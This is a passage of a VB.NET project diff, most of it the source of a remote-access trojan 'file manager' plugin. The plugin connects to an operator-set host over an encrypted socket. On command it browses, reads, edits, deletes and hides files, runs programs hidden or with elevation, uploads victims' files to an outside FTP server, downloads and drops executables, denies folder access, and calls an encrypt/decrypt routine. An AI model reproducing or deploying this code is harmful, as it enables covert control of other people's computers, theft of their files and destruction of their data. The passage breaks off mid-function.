<resheader name="resmimetype">text/microsoft-resx</resheader>
|
||||
<resheader name="version">2.0</resheader>
|
||||
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
|
||||
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
|
||||
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
|
||||
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
|
||||
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
|
||||
<value>[base64 mime encoded serialized .NET Framework object]</value>
|
||||
</data>
|
||||
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
|
||||
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
|
||||
<comment>This is a comment</comment>
|
||||
</data>
|
||||
|
||||
There are any number of "resheader" rows that contain simple
|
||||
name/value pairs.
|
||||
|
||||
Each data row contains a name, and value. The row also contains a
|
||||
type or mimetype. Type corresponds to a .NET class that support
|
||||
text/value conversion through the TypeConverter architecture.
|
||||
Classes that don't support this are serialized and stored with the
|
||||
mimetype set.
|
||||
|
||||
The mimetype is used for serialized objects, and tells the
|
||||
ResXResourceReader how to depersist the object. This is currently not
|
||||
extensible. For a given mimetype the value must be set accordingly:
|
||||
|
||||
Note - application/x-microsoft.net.object.binary.base64 is the format
|
||||
that the ResXResourceWriter will generate, however the reader can
|
||||
read any of the formats listed below.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.binary.base64
|
||||
value : The object must be serialized with
|
||||
: System.Serialization.Formatters.Binary.BinaryFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.soap.base64
|
||||
value : The object must be serialized with
|
||||
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
|
||||
: and then encoded with base64 encoding.
|
||||
|
||||
mimetype: application/x-microsoft.net.object.bytearray.base64
|
||||
value : The object must be serialized into a byte array
|
||||
: using a System.ComponentModel.TypeConverter
|
||||
: and then encoded with base64 encoding.
|
||||
-->
|
||||
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
|
||||
<xsd:element name="root" msdata:IsDataSet="true">
|
||||
<xsd:complexType>
|
||||
<xsd:choice maxOccurs="unbounded">
|
||||
<xsd:element name="metadata">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
<xsd:attribute name="type" type="xsd:string" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="assembly">
|
||||
<xsd:complexType>
|
||||
<xsd:attribute name="alias" type="xsd:string" />
|
||||
<xsd:attribute name="name" type="xsd:string" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="data">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" msdata:Ordinal="1" />
|
||||
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
|
||||
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
<xsd:element name="resheader">
|
||||
<xsd:complexType>
|
||||
<xsd:sequence>
|
||||
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
|
||||
</xsd:sequence>
|
||||
<xsd:attribute name="name" type="xsd:string" use="required" />
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:choice>
|
||||
</xsd:complexType>
|
||||
</xsd:element>
|
||||
</xsd:schema>
|
||||
<resheader name="resmimetype">
|
||||
<value>text/microsoft-resx</value>
|
||||
</resheader>
|
||||
<resheader name="version">
|
||||
<value>2.0</value>
|
||||
</resheader>
|
||||
<resheader name="reader">
|
||||
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
<resheader name="writer">
|
||||
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
|
||||
</resheader>
|
||||
</root>
|
||||
@@ -0,0 +1,73 @@
|
||||
'------------------------------------------------------------------------------
|
||||
' <auto-generated>
|
||||
' This code was generated by a tool.
|
||||
' Runtime Version:4.0.30319.42000
|
||||
'
|
||||
' Changes to this file may cause incorrect behavior and will be lost if
|
||||
' the code is regenerated.
|
||||
' </auto-generated>
|
||||
'------------------------------------------------------------------------------
|
||||
|
||||
Option Strict On
|
||||
Option Explicit On
|
||||
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute(), _
|
||||
Global.System.CodeDom.Compiler.GeneratedCodeAttribute("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "17.14.0.0"), _
|
||||
Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Partial Friend NotInheritable Class MySettings
|
||||
Inherits Global.System.Configuration.ApplicationSettingsBase
|
||||
|
||||
Private Shared defaultInstance As MySettings = CType(Global.System.Configuration.ApplicationSettingsBase.Synchronized(New MySettings()),MySettings)
|
||||
|
||||
#Region "My.Settings Auto-Save Functionality"
|
||||
#If _MyType = "WindowsForms" Then
|
||||
Private Shared addedHandler As Boolean
|
||||
|
||||
Private Shared addedHandlerLockObject As New Object
|
||||
|
||||
<Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), Global.System.ComponentModel.EditorBrowsableAttribute(Global.System.ComponentModel.EditorBrowsableState.Advanced)> _
|
||||
Private Shared Sub AutoSaveSettings(sender As Global.System.Object, e As Global.System.EventArgs)
|
||||
If My.Application.SaveMySettingsOnExit Then
|
||||
My.Settings.Save()
|
||||
End If
|
||||
End Sub
|
||||
#End If
|
||||
#End Region
|
||||
|
||||
Public Shared ReadOnly Property [Default]() As MySettings
|
||||
Get
|
||||
|
||||
#If _MyType = "WindowsForms" Then
|
||||
If Not addedHandler Then
|
||||
SyncLock addedHandlerLockObject
|
||||
If Not addedHandler Then
|
||||
AddHandler My.Application.Shutdown, AddressOf AutoSaveSettings
|
||||
addedHandler = True
|
||||
End If
|
||||
End SyncLock
|
||||
End If
|
||||
#End If
|
||||
Return defaultInstance
|
||||
End Get
|
||||
End Property
|
||||
End Class
|
||||
End Namespace
|
||||
|
||||
Namespace My
|
||||
|
||||
<Global.Microsoft.VisualBasic.HideModuleNameAttribute(), _
|
||||
Global.System.Diagnostics.DebuggerNonUserCodeAttribute(), _
|
||||
Global.System.Runtime.CompilerServices.CompilerGeneratedAttribute()> _
|
||||
Friend Module MySettingsProperty
|
||||
|
||||
<Global.System.ComponentModel.Design.HelpKeywordAttribute("My.Settings")> _
|
||||
Friend ReadOnly Property Settings() As Global.Plugin.My.MySettings
|
||||
Get
|
||||
Return Global.Plugin.My.MySettings.Default
|
||||
End Get
|
||||
End Property
|
||||
End Module
|
||||
End Namespace
|
||||
@@ -0,0 +1,7 @@
|
||||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<SettingsFile xmlns="http://schemas.microsoft.com/VisualStudio/2004/01/settings" CurrentProfile="(Default)" UseMySettingsClassName="true">
|
||||
<Profiles>
|
||||
<Profile Name="(Default)" />
|
||||
</Profiles>
|
||||
<Settings />
|
||||
</SettingsFile>
|
||||
@@ -0,0 +1,629 @@
|
||||
Imports System.IO
|
||||
Imports System.Net.Sockets
|
||||
Imports System.Security.Cryptography
|
||||
Imports System.Drawing
|
||||
Imports System.Drawing.Imaging
|
||||
Imports System.Net
|
||||
Imports System.IO.Compression
|
||||
Imports Microsoft.WindowsAPICodePack.Shell
|
||||
Imports System.Threading
|
||||
Imports System.Security.AccessControl
|
||||
|
||||
Public Class Plugin
|
||||
|
||||
Public Shared T1 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.BeginConnect))
|
||||
Public Shared T2 As New Threading.Thread(New Threading.ThreadStart(AddressOf ClientSocket.Ping))
|
||||
|
||||
Public Shared Function Run(ByVal H As String, ByVal P As String, ByVal SL As String, ByVal K As String, ByVal id As String)
|
||||
Try
|
||||
Settings.Host = H
|
||||
Settings.Port = P
|
||||
Settings.SPL = SL
|
||||
Settings.KEY = K
|
||||
Settings.IDD = id
|
||||
T1.Start()
|
||||
T2.Start()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Function
|
||||
End Class
|
||||
Public Class Settings
|
||||
Public Shared Host As String
|
||||
Public Shared Port As String
|
||||
Public Shared KEY As String
|
||||
Public Shared SPL As String
|
||||
Public Shared IDD As String
|
||||
End Class
|
||||
Public Class ClientSocket
|
||||
Public Shared isConnected As Boolean = False
|
||||
Public Shared S As Socket
|
||||
Public Shared BufferLength As Long = Nothing
|
||||
Public Shared Buffer() As Byte
|
||||
Public Shared MS As New MemoryStream
|
||||
Public Shared Sub BeginConnect()
|
||||
S = New Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp)
|
||||
BufferLength = -1
|
||||
Buffer = New Byte(0) {}
|
||||
MS = New MemoryStream
|
||||
|
||||
S.ReceiveBufferSize = 50 * 1024
|
||||
S.SendBufferSize = 50 * 1024
|
||||
|
||||
Try
|
||||
S.Connect(Settings.Host, Settings.Port)
|
||||
isConnected = True
|
||||
|
||||
ClientSocket.Send("FileM" & Settings.SPL & Settings.IDD)
|
||||
|
||||
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Shared Sub BeginReceive(ByVal ar As IAsyncResult)
|
||||
If isConnected = False Then isDisconnected()
|
||||
Try
|
||||
Dim Received As Integer = S.EndReceive(ar)
|
||||
If Received > 0 Then
|
||||
If BufferLength = -1 Then
|
||||
If Buffer(0) = 0 Then
|
||||
BufferLength = BS(MS.ToArray)
|
||||
MS.Dispose()
|
||||
MS = New MemoryStream
|
||||
|
||||
If BufferLength = 0 Then
|
||||
BufferLength = -1
|
||||
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
|
||||
Exit Sub
|
||||
End If
|
||||
Buffer = New Byte(BufferLength - 1) {}
|
||||
Else
|
||||
MS.WriteByte(Buffer(0))
|
||||
End If
|
||||
Else
|
||||
MS.Write(Buffer, 0, Received)
|
||||
If (MS.Length = BufferLength) Then
|
||||
|
||||
Dim thread = New Thread(AddressOf BeginRead)
|
||||
thread.Start(MS.ToArray)
|
||||
|
||||
BufferLength = -1
|
||||
MS.Dispose()
|
||||
MS = New MemoryStream
|
||||
Buffer = New Byte(0) {}
|
||||
Else
|
||||
Buffer = New Byte(BufferLength - MS.Length - 1) {}
|
||||
End If
|
||||
End If
|
||||
Else
|
||||
isDisconnected()
|
||||
Exit Sub
|
||||
End If
|
||||
S.BeginReceive(Buffer, 0, Buffer.Length, SocketFlags.None, New AsyncCallback(AddressOf BeginReceive), S)
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
Exit Sub
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Shared Sub BeginRead(ByVal b As Byte())
|
||||
Try
|
||||
Messages.Read(b)
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Shared Sub Send(ByVal msg As String)
|
||||
Try
|
||||
Using MS As New MemoryStream
|
||||
Dim B As Byte() = AES_Encryptor(SB(msg))
|
||||
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
|
||||
|
||||
MS.Write(L, 0, L.Length)
|
||||
MS.Write(B, 0, B.Length)
|
||||
|
||||
S.Poll(-1, SelectMode.SelectWrite)
|
||||
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
|
||||
End Using
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
|
||||
Public Shared Sub isDisconnected()
|
||||
isConnected = False
|
||||
|
||||
Try
|
||||
S.Close()
|
||||
S.Dispose()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
Try
|
||||
MS.Close()
|
||||
MS.Dispose()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
Try
|
||||
Plugin.T1.Abort()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
Try
|
||||
Plugin.T2.Abort()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
End Sub
|
||||
|
||||
Public Shared Sub Ping()
|
||||
While True
|
||||
Threading.Thread.Sleep(30 * 1000)
|
||||
Try
|
||||
If S.Connected Then
|
||||
Using MS As New MemoryStream
|
||||
Dim B As Byte() = AES_Encryptor(SB("PING?"))
|
||||
Dim L As Byte() = SB(B.Length & CChar(vbNullChar))
|
||||
|
||||
MS.Write(L, 0, L.Length)
|
||||
MS.Write(B, 0, B.Length)
|
||||
|
||||
S.Poll(-1, SelectMode.SelectWrite)
|
||||
S.Send(MS.ToArray, 0, MS.Length, SocketFlags.None)
|
||||
GC.Collect()
|
||||
End Using
|
||||
End If
|
||||
Catch ex As Exception
|
||||
isDisconnected()
|
||||
End Try
|
||||
End While
|
||||
End Sub
|
||||
End Class
|
||||
|
||||
Public Class Messages
|
||||
|
||||
Private Shared WithEvents Player As Object
|
||||
Private Shared zip As String = IO.Path.GetTempPath & "7zip"
|
||||
|
||||
Private Declare Function SystemParametersInfo Lib "user32" Alias "SystemParametersInfoA" (ByVal uAction As Integer, ByVal uParam As Integer, ByVal lpvParam As String, ByVal fuWinIni As Integer) As Integer
|
||||
Private Const SETDESKWALLPAPER = 20
|
||||
Private Const UPDATEINIFILE = &H1
|
||||
Public Shared Sub Read(ByVal b As Byte())
|
||||
Try
|
||||
Dim A As String() = Split(BS(AES_Decryptor(b)), Settings.SPL)
|
||||
Select Case A(0)
|
||||
|
||||
Case "CloseFM"
|
||||
ClientSocket.isDisconnected()
|
||||
|
||||
Case "GetDrives"
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & GetDrives())
|
||||
|
||||
Case "FileManager"
|
||||
Try
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & GetFolders(A(1)) & GetFiles(A(1)))
|
||||
Catch ex As Exception
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & "Error" & Settings.SPL & ex.Message)
|
||||
End Try
|
||||
|
||||
Case "GOTO"
|
||||
Try
|
||||
Select Case A(1)
|
||||
Case "Desktop"
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & GetFolders(Environment.GetFolderPath(Environment.SpecialFolder.Desktop)) & GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Desktop)) & Settings.SPL & Environment.GetFolderPath(Environment.SpecialFolder.Desktop))
|
||||
Exit Select
|
||||
Case "AppData"
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & GetFolders(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) & GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)) & Settings.SPL & Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData))
|
||||
Exit Select
|
||||
Case "Temp"
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & GetFolders(Environ("Temp")) & GetFiles(Environ("Temp")) & Settings.SPL & Environ("Temp"))
|
||||
Exit Select
|
||||
Case "User"
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & GetFolders(Environ("UserProfile")) & GetFiles(Environ("UserProfile")) & Settings.SPL & Environ("UserProfile"))
|
||||
Exit Select
|
||||
Case "Startup"
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & GetFolders(Environment.GetFolderPath(Environment.SpecialFolder.Startup)) & GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.Startup)) & Settings.SPL & Environment.GetFolderPath(Environment.SpecialFolder.Startup))
|
||||
Exit Select
|
||||
End Select
|
||||
Catch ex As Exception
|
||||
ClientSocket.Send("FileManager" & Settings.SPL & Settings.IDD & Settings.SPL & "Error" & Settings.SPL & ex.Message)
|
||||
End Try
|
||||
|
||||
Case "Delete"
|
||||
Select Case A(1)
|
||||
Case "Folder"
|
||||
IO.Directory.Delete(A(2), True)
|
||||
SendMsg(IO.Path.GetFileName(A(2)) & " Deleted")
|
||||
Exit Select
|
||||
Case "File"
|
||||
IO.File.Delete(A(2))
|
||||
SendMsg(IO.Path.GetFileName(A(2)) & " Deleted")
|
||||
Exit Select
|
||||
End Select
|
||||
Case "Execute"
|
||||
Process.Start(A(1))
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Started")
|
||||
Case "ExecuteHide"
|
||||
Shell(A(1), AppWinStyle.Hide)
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Started")
|
||||
Case "ExecuteRunAs"
|
||||
Process.Start(New ProcessStartInfo With {
|
||||
.FileName = "cmd.exe",
|
||||
.Arguments = "/c start " & """" & """" & " " & """" & A(1) & """",
|
||||
.CreateNoWindow = True,
|
||||
.Verb = "runas",
|
||||
.WindowStyle = ProcessWindowStyle.Hidden,
|
||||
.UseShellExecute = True,
|
||||
.ErrorDialog = False
|
||||
})
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Started")
|
||||
Case "Rename"
|
||||
Select Case A(1)
|
||||
Case "Folder"
|
||||
My.Computer.FileSystem.RenameDirectory(A(2), A(3))
|
||||
SendMsg(IO.Path.GetFileName(A(2)) & " Renamed")
|
||||
Exit Select
|
||||
Case "File"
|
||||
My.Computer.FileSystem.RenameFile(A(2), A(3))
|
||||
SendMsg(IO.Path.GetFileName(A(2)) & " Renamed")
|
||||
Exit Select
|
||||
End Select
|
||||
|
||||
Case "tss"
|
||||
Dim r As String = (My.Computer.FileSystem.ReadAllText((A(1))))
|
||||
ClientSocket.Send("txtttt" & Settings.SPL & Settings.IDD & Settings.SPL & r & Settings.SPL & A(1))
|
||||
|
||||
Case "sedit"
|
||||
Dim objWriter As New System.IO.StreamWriter(A(1), False)
|
||||
objWriter.WriteLine(A(2))
|
||||
objWriter.Close()
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Saved")
|
||||
|
||||
Case "Hash"
|
||||
Dim filename As String = A(1)
|
||||
Dim hash As String = (CalculateMD5((filename)))
|
||||
ClientSocket.Send("Hash" & Settings.SPL & Settings.IDD & Settings.SPL & hash & Settings.SPL & IO.Path.GetFileName(filename))
|
||||
|
||||
Case "viewimage"
|
||||
Using MEM As New IO.MemoryStream
|
||||
Using myBitmap As Bitmap = New Bitmap(A(1))
|
||||
myBitmap.GetThumbnailImage(Convert.ToInt32(A(2)), Convert.ToInt32(A(3)), New Image.GetThumbnailImageAbort(Function() False), IntPtr.Zero).Save(MEM, ImageFormat.Png)
|
||||
End Using
|
||||
ClientSocket.Send(("viewimage" & Settings.SPL & Settings.IDD & Settings.SPL & Convert.ToBase64String(Compress(MEM.ToArray))))
|
||||
End Using
|
||||
Case "viewvideo"
|
||||
Using MEM As New IO.MemoryStream
|
||||
Dim shellFile As ShellFile = ShellFile.FromFilePath(A(1))
|
||||
Dim bm As Bitmap = shellFile.Thumbnail.Bitmap
|
||||
bm.Save(MEM, ImageFormat.Png)
|
||||
ClientSocket.Send(("viewimage" & Settings.SPL & Settings.IDD & Settings.SPL & Convert.ToBase64String(Compress(MEM.ToArray))))
|
||||
End Using
|
||||
|
||||
Case "hidefolderfile"
|
||||
Dim hiden As FileAttribute = FileAttribute.Hidden
|
||||
SetAttr(A(1), hiden)
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Hidden")
|
||||
|
||||
|
||||
Case "showfolderfile"
|
||||
Dim shown As FileAttribute = FileAttribute.Normal
|
||||
SetAttr(A(1), shown)
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Normal")
|
||||
|
||||
Case "creatnewfolder"
|
||||
My.Computer.FileSystem.CreateDirectory(A(1))
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Created")
|
||||
|
||||
Case "creatfile"
|
||||
File.Create(A(1)).Dispose()
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Created")
|
||||
|
||||
Case "downloadfile"
|
||||
Dim File As String = Convert.ToBase64String(Compress(IO.File.ReadAllBytes(A(1))))
|
||||
Dim Filename As String = A(2)
|
||||
|
||||
SendMsg(Filename & " Downloading..")
|
||||
|
||||
ClientSocket.Send("downloadedfile" & Settings.SPL & Settings.IDD & Settings.SPL & File & Settings.SPL & Filename)
|
||||
|
||||
Case "sendfileto"
|
||||
IO.File.WriteAllBytes(A(1), Decompress(Convert.FromBase64String(A(2))))
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Uploaded")
|
||||
|
||||
Case "7zIT"
|
||||
If Not IO.Directory.Exists(zip) Then
|
||||
IO.Directory.CreateDirectory(zip)
|
||||
IO.File.WriteAllBytes(zip & "\" & "7z.exe", Decompress(Convert.FromBase64String(A(1))))
|
||||
IO.File.WriteAllBytes(zip & "\" & "7z.dll", Decompress(Convert.FromBase64String(A(2))))
|
||||
SendMsg("7zip Installed Successfully")
|
||||
Else
|
||||
SendMsg("7zip Already Installed")
|
||||
End If
|
||||
|
||||
|
||||
Case "7z"
|
||||
Dim PSInfo As New ProcessStartInfo(zip & "\7z.exe")
|
||||
PSInfo.WindowStyle = ProcessWindowStyle.Hidden
|
||||
PSInfo.Arguments = A(1)
|
||||
Dim PS As Process = Process.Start(PSInfo)
|
||||
PS.WaitForExit()
|
||||
SendMsg("7zip Process Completed")
|
||||
|
||||
|
||||
|
||||
Case "CPP"
|
||||
For Each XX In Strings.Split(A(1), ("-=>"))
|
||||
Try
|
||||
If IO.File.Exists(XX) Then
|
||||
IO.File.Copy(XX, A(2) & IO.Path.GetFileName(XX))
|
||||
SendMsg(IO.Path.GetFileName(XX) & " Copied")
|
||||
End If
|
||||
|
||||
If IO.Directory.Exists(XX) Then
|
||||
My.Computer.FileSystem.CopyDirectory(XX, A(2) & IO.Path.GetFileName(XX), True)
|
||||
SendMsg(IO.Path.GetFileName(XX) & " Copied")
|
||||
End If
|
||||
Catch ex As Exception
|
||||
End Try
|
||||
Next
|
||||
Case "CTT"
|
||||
For Each XX In Strings.Split(A(1), ("-=>"))
|
||||
Try
|
||||
If IO.File.Exists(XX) Then
|
||||
IO.File.Move(XX, A(2) & IO.Path.GetFileName(XX))
|
||||
SendMsg(IO.Path.GetFileName(XX) & " Moved")
|
||||
End If
|
||||
|
||||
If IO.Directory.Exists(XX) Then
|
||||
My.Computer.FileSystem.MoveDirectory(XX, A(2) & IO.Path.GetFileName(XX), True)
|
||||
SendMsg(IO.Path.GetFileName(XX) & " Moved")
|
||||
End If
|
||||
Catch ex As Exception
|
||||
End Try
|
||||
Next
|
||||
|
||||
|
||||
|
||||
|
||||
Case "RSS"
|
||||
Try
|
||||
Try
|
||||
Player.Close()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
Player = New WMPLib.WindowsMediaPlayer
|
||||
Player.URL = A(1)
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Played")
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
Case "RSSDis"
|
||||
Try
|
||||
Player.Close()
|
||||
SendMsg("Audio Stop")
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
|
||||
|
||||
Case "ENC"
|
||||
Encoder.ENC(Settings.IDD, A(1))
|
||||
|
||||
Case "DEC"
|
||||
Encoder.DEC(Settings.IDD, A(1))
|
||||
|
||||
Case "LockDir"
|
||||
Lock(A(1), Environment.UserName, FileSystemRights.ReadData, AccessControlType.Deny)
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Locked")
|
||||
|
||||
Case "UnlockDir"
|
||||
UnLock(A(1), Environment.UserName, FileSystemRights.ReadData, AccessControlType.Deny)
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " UnLocked")
|
||||
|
||||
Case "UPtoFtp"
|
||||
Try
|
||||
ServicePointManager.Expect100Continue = True
|
||||
ServicePointManager.SecurityProtocol = DirectCast(3072, SecurityProtocolType)
|
||||
ServicePointManager.DefaultConnectionLimit = 9999
|
||||
Catch
|
||||
End Try
|
||||
|
||||
Dim Credential As NetworkCredential = New NetworkCredential(A(1), A(2))
|
||||
Dim host As String = "ftp://" & A(3) & ":" & A(4)
|
||||
Dim paths As String = A(5)
|
||||
|
||||
Try
|
||||
SendMsg("Ftp.MakeDirectory: " & Settings.IDD)
|
||||
Dim request As WebRequest = WebRequest.Create(host & "/" & Settings.IDD)
|
||||
request.Credentials = Credential
|
||||
request.Method = WebRequestMethods.Ftp.MakeDirectory
|
||||
request.GetResponse()
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine("Ftp.MakeDirectory :" & ex.Message)
|
||||
End Try
|
||||
|
||||
For Each Files In Strings.Split(paths, "-=>")
|
||||
If System.IO.File.Exists(Files) Then
|
||||
Dim withBlock = New WebClient()
|
||||
withBlock.Credentials = Credential
|
||||
SendMsg(System.IO.Path.GetFileName(Files) & " Uploading..")
|
||||
withBlock.UploadFile(host & "/" & Settings.IDD & "/" & System.IO.Path.GetFileName(Files), Files)
|
||||
SendMsg(System.IO.Path.GetFileName(Files) & " Uploaded successfully")
|
||||
End If
|
||||
Next
|
||||
|
||||
Case "FURL"
|
||||
Try
|
||||
ServicePointManager.Expect100Continue = True
|
||||
ServicePointManager.SecurityProtocol = DirectCast(3072, SecurityProtocolType)
|
||||
ServicePointManager.DefaultConnectionLimit = 9999
|
||||
Catch
|
||||
End Try
|
||||
SendMsg(IO.Path.GetFileName(A(2)) & " Downloading..")
|
||||
Dim Web As New WebClient
|
||||
Web.DownloadFile(A(1), A(2))
|
||||
SendMsg(IO.Path.GetFileName(A(2)) & " Downloaded")
|
||||
|
||||
|
||||
Case "ChangeWL"
|
||||
SystemParametersInfo(SETDESKWALLPAPER, 0, A(1), UPDATEINIFILE)
|
||||
SendMsg(IO.Path.GetFileName(A(1)) & " Background Changed")
|
||||
|
||||
|
||||
|
||||
End Select
|
||||
Catch ex As Exception
|
||||
ClientSocket.Send("FileManagerErr" & Settings.SPL & Settings.IDD & Settings.SPL & ex.Message)
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
|
||||
End Class
|
||||
|
||||
Module Helper
|
||||
|
||||
Public Function CalculateMD5(filePath As String) As String
|
||||
Using md5Provider As New MD5CryptoServiceProvider()
|
||||
Using fileStream As FileStream = File.OpenRead(filePath)
|
||||
Dim hashBytes As Byte() = md5Provider.ComputeHash(fileStream)
|
||||
Return BitConverter.ToString(hashBytes).Replace("-", "").ToLower()
|
||||
End Using
|
||||
End Using
|
||||
End Function
|
||||
|
||||
Public Sub Lock(fileName As String, account As String, rights As FileSystemRights, controlType As AccessControlType)
|
||||
Dim flag As Boolean = File.Exists(fileName) OrElse Directory.Exists(fileName)
|
||||
If flag Then
|
||||
Dim accessControl As FileSecurity = File.GetAccessControl(fileName)
|
||||
accessControl.AddAccessRule(New FileSystemAccessRule(account, rights, controlType))
|
||||
File.SetAccessControl(fileName, accessControl)
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Public Sub UnLock(fileName As String, account As String, rights As FileSystemRights, controlType As AccessControlType)
|
||||
Dim flag As Boolean = File.Exists(fileName) OrElse Directory.Exists(fileName)
|
||||
If flag Then
|
||||
Dim accessControl As FileSecurity = File.GetAccessControl(fileName)
|
||||
accessControl.RemoveAccessRule(New FileSystemAccessRule(account, rights, controlType))
|
||||
File.SetAccessControl(fileName, accessControl)
|
||||
End If
|
||||
End Sub
|
||||
|
||||
Public Sub SendMsg(ByVal msg As String)
|
||||
Try
|
||||
ClientSocket.Send("FileManagerMSG" & Settings.SPL & Settings.IDD & Settings.SPL & msg)
|
||||
Catch ex As Exception
|
||||
Debug.WriteLine(ex.Message)
|
||||
End Try
|
||||
End Sub
|
||||
|
||||
Public Function GetFolders(ByVal location) As String
|
||||
Dim di As New DirectoryInfo(location)
|
||||
Dim folders = ""
|
||||
For Each subdi As DirectoryInfo In di.GetDirectories
|
||||
Dim lastWriteTime As DateTime = Directory.GetLastWriteTime(subdi.FullName)
|
||||
folders &= "[Folder]" & subdi.Name & "-=>-=>" & lastWriteTime.ToString & "-=>"
|
||||
Next
|
||||
Return folders
|
||||
End Function
|
||||
Public Function GetFiles(ByVal location) As String
|
||||
Dim dir As New System.IO.DirectoryInfo(location)
|
||||
Dim files = ""
|
||||
For Each f As System.IO.FileInfo In dir.GetFiles("*.*")
|
||||
Dim lastWriteTime As DateTime = File.GetLastWriteTime(f.FullName)
|
||||
